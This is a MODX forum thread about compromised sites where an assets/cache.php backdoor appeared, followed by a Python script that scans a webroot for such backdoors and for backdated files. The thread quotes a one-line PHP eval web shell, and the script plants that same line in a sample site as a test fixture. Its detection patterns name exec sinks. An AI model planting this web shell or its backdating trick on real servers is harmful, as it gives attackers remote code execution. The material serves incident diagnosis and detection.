    • 10075
    • 20 Posts
    While other folks have suggested the possibility of a pre-2.2.14 breach, in my case I don't believe this to be true. My system did not begin displaying evidence of this hack until after I had upgraded to 2.2.14 (I upgraded in April, and the hack first appeared in May). At first, I thought the attack vector was somewhere else, most likely a configuration of the security on the shared server I'm hosted on. I removed the hostile files and re-loaded 2.2.14 from a clean download; the hack reappeared a day later.

    In my case, there was no unexpected MODx user added to my system, so I do not believe the flaw that allowed creation of users was the exploit vector here.

    It does seem that the person or people responsible for this attack is/are targeting MODx. I say that because on older versions of MODx, the exploit did attack the create-user flaw, but the same attack now seems to be exploiting another flaw to accomplish the same thing. The person/people behind it would seem to have an intimate understanding of MODx.

    On my system, I have examined other possible weaknesses--weak FTP passwords, bad Apache configuration, and so on--and I have been working with my shared hosting provider to examine the shared server configuration looking for flaws. So far, we have not been able to discover how the cache.php file was created or how the MODx files were modified.

    I am not prepared to say with 100% certainty that a zero-day exploit exists and is being attacked, but I do think that's a possibility that needs to be taken seriously.
    • One person reported that the cache.php files had dates of up to a year before they were apparently activated. So you could have had the triggering file hanging around for some unspecified amount of time.
        Studying MODX in the desert - http://sottwell.com
        Tips and Tricks from the MODX Forums and Slack Channels - http://modxcookbook.com
        Join the Slack Community - http://modx.org
      • Someone just informed me that their hosting support says that the assets/cache.php file is not a hack, but is something MODX puts in when it upgrades. huh
          Studying MODX in the desert - http://sottwell.com
          Tips and Tricks from the MODX Forums and Slack Channels - http://modxcookbook.com
          Join the Slack Community - http://modx.org
          • 3749
          • 24,544 Posts
          I have no such file in my 2.3.1 install and IIRC, people report that file as containing clearly malicious code.

          BTW, having the attack occur at some future date is an excellent strategy for hackers. Over time the malicious file(s) will make it into all possible backups.
            Did I help you? Buy me a beer
            Get my Book: MODX:The Official Guide
            MODX info for everyone: http://bobsguides.com/modx.html
            My MODX Extras
            Bob's Guides is now hosted at A2 MODX Hosting
            • 10075
            • 20 Posts
            This file is not part of a normal MODX install, and when it exists, it contains only one line of PHP code whose function is to allow an attacker to run arbitrary PHP commands on the server.
            • The person has moved his site to a different hosting provider wink
                Studying MODX in the desert - http://sottwell.com
                Tips and Tricks from the MODX Forums and Slack Channels - http://modxcookbook.com
                Join the Slack Community - http://modx.org
                • 50426
                • 1 Posts
                Hi, I have the same problem with my web site as Cottagestuff.
                At the moment I am using version Revo 2.2.8 traditional.
                Here is the troublemaker: http://stat.rolledwil.biz/stat.php?810239116
                Can somebody help me with that please?
                Thank you, Zani
                [email protected]

                Quote from: cottagestuff at Aug 05, 2013, 09:24 PM
                Just a note to see if others have had the same problem and know where exactly the vulnerability is. 5 sites using MODX Revolution 2.2.6 had a file injected in the assets folder called cache.php, the contents being:

                <?php @eval(stripslashes($_REQUEST[ev]));

                Does anyone have further information about how that occurs and what needs to be done to stop it in the future?

                All sites are now being upgraded to 2.2.8.
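The thread describes three things a defender can check for: a one-line PHP file whose only purpose is to hand request input to eval, a file that does not belong to a clean release download, and a file timestamp backdated so that the backdoor ages into every backup before it is used. The scanner below is an added example, not code from the MODX project or from anyone in this thread. It walks a webroot, flags PHP files that combine a code-execution sink with request-controlled input, compares each file against a manifest of expected paths, and treats an mtime far older than the inode ctime as a backdating signal (ctime is updated by the kernel and cannot be set with utime/touch). The indicator regexes, the 30-day threshold, the manifest and the sample site layout (including the path assets/components/demo/connector.php) are this example's own assumptions; the planted one-liner is the same line quoted in the thread.

```python
import os
import re
import tempfile
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set

# Indicators typical of a one-line PHP backdoor: a code-execution sink fed
# straight from request input, often wrapped in unescape/decode calls.
# These patterns are this example's assumption, not anything MODX ships.
EXEC_SINK = re.compile(
    r"\b(eval|assert|create_function|system|passthru|shell_exec|exec|popen)\s*\(", re.I)
REQUEST_INPUT = re.compile(r"\$_(REQUEST|GET|POST|COOKIE)\s*\[", re.I)
UNWRAP = re.compile(
    r"\b(stripslashes|base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I)

# Files older than this (mtime vs. ctime) are reported as possibly backdated.
BACKDATE_THRESHOLD_SECONDS = 30 * 86400  # assumption: tune per site


@dataclass
class Finding:
    relpath: str
    reasons: List[str] = field(default_factory=list)


def inspect_php(path: str, relpath: str, manifest: Set[str]) -> Optional[Finding]:
    """Return a Finding if this PHP file looks like a backdoor or is unexpected."""
    reasons: List[str] = []
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        src = fh.read()

    # 1. Content: execution sink plus request-controlled input in one file.
    if EXEC_SINK.search(src) and REQUEST_INPUT.search(src):
        reasons.append("code-execution sink fed from request input")
        if UNWRAP.search(src):
            reasons.append("input passes through unescape/decode call")

    # 2. Provenance: PHP files that a clean release download does not contain.
    if relpath not in manifest:
        reasons.append("not in clean release manifest")

    # 3. Timestamps: a backdated mtime cannot hide a recent inode change (ctime).
    st = os.stat(path)
    if st.st_ctime - st.st_mtime > BACKDATE_THRESHOLD_SECONDS:
        reasons.append("mtime predates ctime by >30 days (possible backdating)")

    return Finding(relpath, reasons) if reasons else None


def scan(root: str, manifest: Set[str]) -> Dict[str, Finding]:
    """Walk the webroot and collect findings keyed by path relative to root."""
    findings: Dict[str, Finding] = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith((".php", ".phtml", ".php5")):
                continue
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            found = inspect_php(path, rel, manifest)
            if found:
                findings[rel] = found
    return findings


# Constructed manifest standing in for the file list of a clean release download.
CLEAN_MANIFEST = {"index.php", "assets/components/demo/connector.php"}


def build_sample_site() -> str:
    """Constructed sample webroot: two legitimate files and one planted backdoor."""
    root = tempfile.mkdtemp(prefix="modx_scan_")
    os.makedirs(os.path.join(root, "assets", "components", "demo"))
    files = {
        "index.php": "<?php require 'config.core.php'; echo 'hello';\n",
        # Legitimate-looking connector: reads request input but runs no sink.
        "assets/components/demo/connector.php": "<?php $id = (int) $_GET['id']; echo $id;\n",
        # The one-liner quoted in the thread.
        "assets/cache.php": "<?php @eval(stripslashes($_REQUEST[ev]));\n",
    }
    for rel, body in files.items():
        with open(os.path.join(root, rel), "w", encoding="utf-8") as fh:
            fh.write(body)
    # Backdate the planted file by a year, as the thread describes; ctime stays "now".
    old = os.path.getmtime(os.path.join(root, "index.php")) - 365 * 86400
    os.utime(os.path.join(root, "assets", "cache.php"), (old, old))
    return root


if __name__ == "__main__":
    site = build_sample_site()
    for rel, finding in scan(site, CLEAN_MANIFEST).items():
        print(rel, "->", "; ".join(finding.reasons))
```

Run it against a real install with the manifest built from a freshly downloaded release of the same version (for example by listing every file in the unpacked archive); the content check alone is noisy on large code bases, so the manifest and timestamp signals are what narrow the list to files worth reading by hand. Note that a restored backup will also carry the old ctime forward only if the backup tool preserves inodes, which most do not, so the timestamp heuristic is strongest on a live server rather than on a restored copy.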